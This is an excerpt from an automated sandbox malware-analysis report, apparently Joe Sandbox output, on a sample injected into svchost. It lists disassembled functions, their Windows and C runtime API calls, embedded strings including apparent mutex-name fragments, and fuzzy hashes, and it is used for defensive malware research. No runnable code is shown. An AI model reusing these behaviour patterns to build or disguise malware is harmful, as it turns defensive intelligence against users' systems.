Instruction Fuzzy Hash: 0E619B32A04B88C9F752DBA4E8443CD77B2F789798F508126FA9D57AA9CF34C649C740

Function 00000001800019D0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 141
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001800017D0: LocalAlloc.KERNEL32 ref: 0000000180001863
Part of subcall function 00000001800017D0: WideCharToMultiByte.KERNEL32 ref: 000000018000189F
Part of subcall function 00000001800017D0: LocalFree.KERNEL32 ref: 00000001800018CA

Part of subcall function 00000001800018F0: GetComputerNameA.KERNEL32 ref: 0000000180001977

sprintf.LIBCMT ref: 0000000180001AA0

Part of subcall function 0000000180006E38: _errno.LIBCMT ref: 0000000180006E70
Part of subcall function 0000000180006E38: _invalid_parameter_noinfo.LIBCMT ref: 0000000180006E7B

Part of subcall function 0000000180006050: sprintf.LIBCMT ref: 00000001800060EE

OpenMutexA.KERNEL32 ref: 0000000180001B33
GetLastError.KERNEL32 ref: 0000000180001B3C
OpenMutexA.KERNEL32 ref: 0000000180001B61
GetLastError.KERNEL32 ref: 0000000180001B6A
ReleaseMutex.KERNEL32 ref: 0000000180001B7F
CloseHandle.KERNEL32 ref: 0000000180001B88

Strings

13a., xrefs: 0000000180001A12
83y., xrefs: 0000000180001A20
dh74, xrefs: 0000000180001A19
%s%s%saz$%^$%@#sdfs_12, xrefs: 0000000180001A95
asdasd123, xrefs: 0000000180001AAB

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$ErrorLastLocalOpensprintf$AllocByteCharCloseComputerFreeHandleMultiNameReleaseWide_errno_invalid_parameter_noinfo
String ID: %s%s%saz$%^$%@#sdfs_12$13a.$83y.$asdasd123$dh74
API String ID: 3147222814-1644997536
Opcode ID: 39eafb5069d4d64aaf3a6eb29112f8904af6c3e691d05d66285c8ecf96de8288
Instruction ID: a78e320777d2644a08ae027232448d90c61c35bbfbefd3fc46fe211163294679
Opcode Fuzzy Hash: 39eafb5069d4d64aaf3a6eb29112f8904af6c3e691d05d66285c8ecf96de8288
Instruction Fuzzy Hash: 2B619D32A04B88C9F752CBA4E8443CD77B2F789798F508126FA8D57AA9DF74C649C740

Function 000000018000B554 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,00000000,00000001800080DF,?,?,?,00000001800082A3), ref: 000000018000B565
free.LIBCMT ref: 000000018000B582

Part of subcall function 00000001800073D4: HeapFree.KERNEL32(?,?,00000000,000000018000A1D6,?,?,00000800,000000018000A3D1,?,?,?,?,000000018000A7EB), ref: 00000001800073EA
Part of subcall function 00000001800073D4: _errno.LIBCMT ref: 00000001800073F4
Part of subcall function 00000001800073D4: GetLastError.KERNEL32(?,?,00000000,000000018000A1D6,?,?,00000800,000000018000A3D1,?,?,?,?,000000018000A7EB), ref: 00000001800073FC

free.LIBCMT ref: 000000018000B597
free.LIBCMT ref: 000000018000B5B8
free.LIBCMT ref: 000000018000B5CD
free.LIBCMT ref: 000000018000B5E1
free.LIBCMT ref: 000000018000B5ED
free.LIBCMT ref: 000000018000B618
EncodePointer.KERNEL32(?,?,00000000,00000001800080DF,?,?,?,00000001800082A3), ref: 000000018000B620
free.LIBCMT ref: 000000018000B639
free.LIBCMT ref: 000000018000B652
free.LIBCMT ref: 000000018000B683

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: 9f480e9a157ec4e73b23699e557cb40cd369962389f0d03c52fb0e412cd43498
Instruction ID: 7910da082eb8a25f1b72ceb468b50d858c92a30a15ee4efba3f35858ae8eccd0
Opcode Fuzzy Hash: 9f480e9a157ec4e73b23699e557cb40cd369962389f0d03c52fb0e412cd43498
Instruction Fuzzy Hash: B931E831601A8C81FED7DB51E8523E433A1AB5CBE1F09C664BD19462E2CFBC8B4C8B00

Function 000000018000F59C Relevance: 16.3, APIs: 13, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 000000018000F5BA

Part of subcall function 00000001800073D4: HeapFree.KERNEL32(?,?,00000000,000000018000A1D6,?,?,00000800,000000018000A3D1,?,?,?,?,000000018000A7EB), ref: 00000001800073EA
Part of subcall function 00000001800073D4: _errno.LIBCMT ref: 00000001800073F4
Part of subcall function 00000001800073D4: GetLastError.KERNEL32(?,?,00000000,000000018000A1D6,?,?,00000800,000000018000A3D1,?,?,?,?,000000018000A7EB), ref: 00000001800073FC

free.LIBCMT ref: 000000018000F5CC
free.LIBCMT ref: 000000018000F5DE
free.LIBCMT ref: 000000018000F5F0
free.LIBCMT ref: 000000018000F602
free.LIBCMT ref: 000000018000F614
free.LIBCMT ref: 000000018000F626
free.LIBCMT ref: 000000018000F638
free.LIBCMT ref: 000000018000F64A
free.LIBCMT ref: 000000018000F65C
free.LIBCMT ref: 000000018000F671
free.LIBCMT ref: 000000018000F686
free.LIBCMT ref: 000000018000F69B

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: ada72765c9aa323ee31e0f93902f823e7d177c0e768b129a1707f6faaf4597dd
Instruction ID: 1e968e281ede070f6cd340e7967fb3000e68a20db94b7b649401a24c7a871535
Opcode Fuzzy Hash: ada72765c9aa323ee31e0f93902f823e7d177c0e768b129a1707f6faaf4597dd
Instruction Fuzzy Hash: AE313B7260488C91FAE3EB61E4923F83361A79CBC4F448051BD0E87A968F75DF88D761

Function 00000001800027C0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32 ref: 000000018000291B
GetLastError.KERNEL32 ref: 0000000180002924
OpenMutexA.KERNEL32 ref: 0000000180002941
GetLastError.KERNEL32 ref: 000000018000294A

Strings

ecf3@#$$1df6..`34, xrefs: 000000018000287C

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastMutexOpen
String ID: ecf3@#$$1df6..`34
API String ID: 2816522056-3207966746
Opcode ID: 9aa00381d908c6502d3de6d7284ff14170c0eb9b1c9ca468e2e1b8fb5c632e96
Instruction ID: e50fa9bfa1a6f2d9052eae0ffda0a744107ae6dba175da5cab484f5f575a2f75
Opcode Fuzzy Hash: 9aa00381d908c6502d3de6d7284ff14170c0eb9b1c9ca468e2e1b8fb5c632e96
Instruction Fuzzy Hash: 7D716B32B00B448AFB92DF71D4443DC33B2E7497D8F408525EA5A67AA9CF758649C344

Function 0000000180013658 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180013675
_errno.LIBCMT ref: 000000018001366A

Part of subcall function 000000018000A3C8: _getptd_noexit.LIBCMT ref: 000000018000A3CC

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00000001800136D5
_errno.LIBCMT ref: 00000001800136EE
_invalid_parameter_noinfo.LIBCMT ref: 00000001800136F9

Strings

UTF-8, xrefs: 00000001800136B7

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID: UTF-8
API String ID: 781512312-243350608
Opcode ID: 01adfc77747f32d4e18643429f0cdc5f3c07004787623652f90158c8caed5d76
Instruction ID: 263d6387c4d648f040f9d6f91d60d8c10a6fbd426bee965be4cabd021c04e328
Opcode Fuzzy Hash: 01adfc77747f32d4e18643429f0cdc5f3c07004787623652f90158c8caed5d76
Instruction Fuzzy Hash: E931D6F2708B8986FBF79B6195423ED66D0A74CBE0F54C221FA59077D5CE68CB498700

Function 000001AD8946B16C Relevance: 12.6, APIs: 10, Instructions: 116COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 000001AD8946B19A

Part of subcall function 000001AD89466FEC: _errno.LIBCMT ref: 000001AD8946700C

free.LIBCMT ref: 000001AD8946B1AF
free.LIBCMT ref: 000001AD8946B1D0
free.LIBCMT ref: 000001AD8946B1E5
free.LIBCMT ref: 000001AD8946B1F9
free.LIBCMT ref: 000001AD8946B205
free.LIBCMT ref: 000001AD8946B230
free.LIBCMT ref: 000001AD8946B251
free.LIBCMT ref: 000001AD8946B26A
free.LIBCMT ref: 000001AD8946B29B

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 9f480e9a157ec4e73b23699e557cb40cd369962389f0d03c52fb0e412cd43498
Instruction ID: e1fe86c00d840c921d81d8eff2da28ee6f99fbce835c811bb7a569080ef2d395
Opcode Fuzzy Hash: 9f480e9a157ec4e73b23699e557cb40cd369962389f0d03c52fb0e412cd43498
Instruction Fuzzy Hash: 6E415D7031AE095FFB89EB5CF8A4BE436D0F796705F84C028E157C3591CE2C88488796

Function 000000018000EA27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 000000018000EA52
RaiseException.KERNEL32 ref: 000000018000EA7B
__DestructExceptionObject.LIBCMT ref: 000000018000EADC
_getptd.LIBCMT ref: 000000018000EA2F

Part of subcall function 000000018000A148: _getptd_noexit.LIBCMT ref: 000000018000A14E
Part of subcall function 000000018000A148: _amsg_exit.LIBCMT ref: 000000018000A15E

_getptd.LIBCMT ref: 000000018000EAE1
_getptd.LIBCMT ref: 000000018000EAED

Strings

csm, xrefs: 000000018000EAAF

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
String ID: csm
API String ID: 1037122555-1018135373
Opcode ID: 4998a35fcf569e67779e2c8e4107303ccd93ed2d2766f2b59bebc9d01970d615
Instruction ID: 3466defe207cca5ab2c5f43f2eace7dc67b6e628fff817094022631e23cfdfa8
Opcode Fuzzy Hash: 4998a35fcf569e67779e2c8e4107303ccd93ed2d2766f2b59bebc9d01970d615
Instruction Fuzzy Hash: D321213620468986E672DF15E0403DE77A0F38EBA4F448116EF9917795CF38E949CB01

Function 00000001800124F8 Relevance: 12.1, APIs: 8, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 0000000180012525

Part of subcall function 000000018000F468: _FF_MSGBANNER.LIBCMT ref: 000000018000F485
Part of subcall function 000000018000F468: _NMSG_WRITE.LIBCMT ref: 000000018000F48F

_lock.LIBCMT ref: 0000000180012538
_lock.LIBCMT ref: 0000000180012593
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000000,00000109,80000000,0000000180012FCD), ref: 00000001800125A8
EnterCriticalSection.KERNEL32(?,?,00000000,00000109,80000000,0000000180012FCD), ref: 00000001800125C4
LeaveCriticalSection.KERNEL32(?,?,00000000,00000109,80000000,0000000180012FCD), ref: 00000001800125D4
_calloc_crt.LIBCMT ref: 000000018001264A
__lock_fhandle.LIBCMT ref: 00000001800126B2

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: CriticalSection$_lock$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
String ID:
API String ID: 854778215-0
Opcode ID: d44b873149b9006942da67a867c652ae1859f4a614215c6e6d51a695d0603cc5
Instruction ID: d9834fd355bf36162af0ef2ab7236a0e4ccf652efea0cfded55badc8211a2e5e
Opcode Fuzzy Hash: d44b873149b9006942da67a867c652ae1859f4a614215c6e6d51a695d0603cc5
Instruction Fuzzy Hash: 2151E332600F4882EBA2DF10D8403A9B3A5F788BD4F198525EE4D477E5EF78CA69C700

Function 00000001800128EC Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000000180012905

Part of subcall function 000000018000A3C8: _getptd_noexit.LIBCMT ref: 000000018000A3CC

__lock_fhandle.LIBCMT ref: 000000018001294D
FlushFileBuffers.KERNEL32(00000001,00000000,00000000,000000018000CA42,?,?,00000001,000000018000CB6D,?,?,?,?,?,000000018000C11D), ref: 0000000180012968
GetLastError.KERNEL32(?,?,00000001,000000018000CB6D,?,?,?,?,?,000000018000C11D), ref: 0000000180012972
_errno.LIBCMT ref: 0000000180012989
_unlock_fhandle.LIBCMT ref: 0000000180012999

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _errno$BuffersErrorFileFlushLast__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 211752500-0
Opcode ID: 83061492b3cd907090767c04d13c2902e4ae0f7afc8b56462e1f75332be573f0
Instruction ID: 6ff1552718acc7367ea462429f0e2fd32cbe771c593d226d1026a2c9de20d7c2
Opcode Fuzzy Hash: 83061492b3cd907090767c04d13c2902e4ae0f7afc8b56462e1f75332be573f0
Instruction Fuzzy Hash: 4221D531614F4C45FB975F69A8803ED3650AB8D7E0F59C128FA15073D2EE788B5D8310

Function 000001AD89470394 Relevance: 10.6, APIs: 7, Instructions: 93COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001AD894703BF

Part of subcall function 000001AD89469FE0: _getptd_noexit.LIBCMT ref: 000001AD89469FE4

__lock_fhandle.LIBCMT ref: 000001AD89470403
_lseeki64_nolock.LIBCMT ref: 000001AD8947041C
_unlock_fhandle.LIBCMT ref: 000001AD8947043F

Part of subcall function 000001AD89469F70: _getptd_noexit.LIBCMT ref: 000001AD89469F74

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 75911684-0
Opcode ID: 44286c134b029a49fbd98e52ac3d62de1c89178b32646424a1c650f1b3a6d2cf
Instruction ID: f1db82ea56ecadf460882bbf0e50b612b94b6d0861f4aa272d6f2be615d0b089
Opcode Fuzzy Hash: 44286c134b029a49fbd98e52ac3d62de1c89178b32646424a1c650f1b3a6d2cf
Instruction Fuzzy Hash: 0321A2B070AE086EF3696B5CB8427F972D0EB86720F050659F097C76D7D6A8580182EB

Function 000001AD8946E63F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 000001AD8946E66A
__DestructExceptionObject.LIBCMT ref: 000001AD8946E6F4
_getptd.LIBCMT ref: 000001AD8946E647

Part of subcall function 000001AD89469D60: _getptd_noexit.LIBCMT ref: 000001AD89469D66

_getptd.LIBCMT ref: 000001AD8946E6F9
_getptd.LIBCMT ref: 000001AD8946E705

Strings

csm, xrefs: 000001AD8946E6C7

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd$DestructExceptionObject$_getptd_noexit
String ID: csm
API String ID: 1546832303-1018135373
Opcode ID: 318814a81c34ddbc9fdd873e733cdffc2da081c5b938eaa1a7ece9fcdc15d50c
Instruction ID: 0a1555417fe1b9f0fed2d307b5be55228387487e32c5442b8fa2b8409347c6ed
Opcode Fuzzy Hash: 318814a81c34ddbc9fdd873e733cdffc2da081c5b938eaa1a7ece9fcdc15d50c
Instruction Fuzzy Hash: 97316D71218A048FEB65EF4CE4417AA77E1FB99710F50055DD4CAC3A92D739B842CB87

Function 000001AD8946C464 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001AD8946C485

Part of subcall function 000001AD89469FE0: _getptd_noexit.LIBCMT ref: 000001AD89469FE4

__lock_fhandle.LIBCMT ref: 000001AD8946C4C9
_close_nolock.LIBCMT ref: 000001AD8946C4DC
_unlock_fhandle.LIBCMT ref: 000001AD8946C4F5

Part of subcall function 000001AD89469F70: _getptd_noexit.LIBCMT ref: 000001AD89469F74

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 1789918242-0
Opcode ID: d6ce03e6b060e43d1d524192b8fdd189dd33d3aeff32cba8491392d779f6d76c
Instruction ID: 5fe66feb3c11bbdb3e0273824ebb3533b0d4734533b43abcc3f203c4aeb1a044
Opcode Fuzzy Hash: d6ce03e6b060e43d1d524192b8fdd189dd33d3aeff32cba8491392d779f6d76c
Instruction Fuzzy Hash: F721FCB220AE045EF32A9B1CAC813E875D0DB43722F16055CE197C79D3C9BC584083DB

Function 000000018001077C Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800107A7

Part of subcall function 000000018000A3C8: _getptd_noexit.LIBCMT ref: 000000018000A3CC

__lock_fhandle.LIBCMT ref: 00000001800107EB
_lseeki64_nolock.LIBCMT ref: 0000000180010804
_unlock_fhandle.LIBCMT ref: 0000000180010827

Part of subcall function 000000018000A358: _getptd_noexit.LIBCMT ref: 000000018000A35C

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 75911684-0
Opcode ID: 191b44ddcdda7e7db2db98606f9b9744266b5c9c12ced36634c24477dfeaf23f
Instruction ID: 082a0466afde9bb3850d00c0593b9c11c2c96bca7adfeef100d519194c15513b
Opcode Fuzzy Hash: 191b44ddcdda7e7db2db98606f9b9744266b5c9c12ced36634c24477dfeaf23f
Instruction Fuzzy Hash: E421C532608A4845F7936F2598013ED75507789BF0F69C714BEB50B3D2CFB88649C760

Function 000000018000C84C Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018000C86D

Part of subcall function 000000018000A3C8: _getptd_noexit.LIBCMT ref: 000000018000A3CC

__lock_fhandle.LIBCMT ref: 000000018000C8B1
_close_nolock.LIBCMT ref: 000000018000C8C4
_unlock_fhandle.LIBCMT ref: 000000018000C8DD

Part of subcall function 000000018000A358: _getptd_noexit.LIBCMT ref: 000000018000A35C

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 1789918242-0
Opcode ID: a43c7a7360c7c8bd12849c2e3308150c4a3f615a40afda899ff6dd190ba4f4c6
Instruction ID: e08694646e838dae24bee4e0541d44834c1e2e836c11a0c128ffef97defdb4c5
Opcode Fuzzy Hash: a43c7a7360c7c8bd12849c2e3308150c4a3f615a40afda899ff6dd190ba4f4c6
Instruction Fuzzy Hash: 6F11083260864C46F387EF34A8857EC3650AB897E0F6ADA24F915473D3DE78C7498315

Function 000001AD8946E73C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000001AD8946E75D
_getptd.LIBCMT ref: 000001AD8946E76B
_getptd.LIBCMT ref: 000001AD8946E77D

Strings

RCC, xrefs: 000001AD8946E743
csm, xrefs: 000001AD8946E753
MOC, xrefs: 000001AD8946E74B

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: 68a62a30ac964d4d124b7cb3d948c13e3dfb564b89cd10a3adaf558711248c99
Instruction ID: a48baf1fa0f478404f5555a2abecc319476755744136d49d048aab61f187a742
Opcode Fuzzy Hash: 68a62a30ac964d4d124b7cb3d948c13e3dfb564b89cd10a3adaf558711248c99
Instruction Fuzzy Hash: 35F012B43229088EFF676768900D3E531D0AB17B06F4544A1D5C6C79A3D7AC1994CADB

Function 000000018000EB24 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000000018000EB45
_getptd.LIBCMT ref: 000000018000EB53
_getptd.LIBCMT ref: 000000018000EB65

Strings

csm, xrefs: 000000018000EB3B
MOC, xrefs: 000000018000EB33
RCC, xrefs: 000000018000EB2B

Memory Dump Source

Source File: 00000001.00000002.3292762928.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000001.00000002.3292689800.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292903685.0000000180016000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3292982056.0000000180022000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3293054483.0000000180026000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000000_svchost.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: fd417adaab07dff1f772147f418f912634d25a0768b647d98fc5c6434095e6c1
Instruction ID: 01aa6a6a228c3c0a0aba81317d871d0cc4a97d627d213273933d2298baaac784
Opcode Fuzzy Hash: fd417adaab07dff1f772147f418f912634d25a0768b647d98fc5c6434095e6c1
Instruction Fuzzy Hash: 8FF06D3650518CC6F7F7AB6480053ED32A1E79E786F8AC461A20157382CFBC4B888B12

Function 000001AD894668A0 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001AD894668DB
_invalid_parameter_noinfo.LIBCMT ref: 000001AD894668E7
_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001AD8946690A
__crtLCMapStringA.LIBCMT ref: 000001AD89466971
_errno.LIBCMT ref: 000001AD894669E3
_errno.LIBCMT ref: 000001AD894669F1

Memory Dump Source

Source File: 00000001.00000003.2034894727.000001AD89460000.00000020.00000400.00020000.00000000.sdmp, Offset: 000001AD89460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_3_1ad89460000_svchost.jbxd

Yara matches

Similarity

API ID: _errno$Locale$StringUpdateUpdate::___crt_invalid_parameter_noinfo
String ID:
API String ID: 2056426365-0
Opcode ID: bdec36b018143d8b9f441de29b73c1729632761a3c52747f4addeb704b0542f9
Instruction ID: dbacb9a966791337a7a3571a3cd5091bb37a6f08850fbe0ebabdade80be3bcf5
Opcode Fuzzy Hash: bdec36b018143d8b9f441de29b73c1729632761a3c52747f4addeb704b0542f9
Instruction Fuzzy Hash: 7741D0B021DF854AF7A69B2C90447AA7BD0EB97704F14056DE8C7C7682DA68C845C3C7

Function 000001AD8946771C Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001AD89467673

Part of subcall function 000001AD89469FE0: _getptd_noexit.LIBCMT ref: 000001AD89469FE4

_invalid_parameter_noinfo.LIBCMT ref: 000001AD8946767E
_getstream.LIBCMT ref: 000001AD8946769E
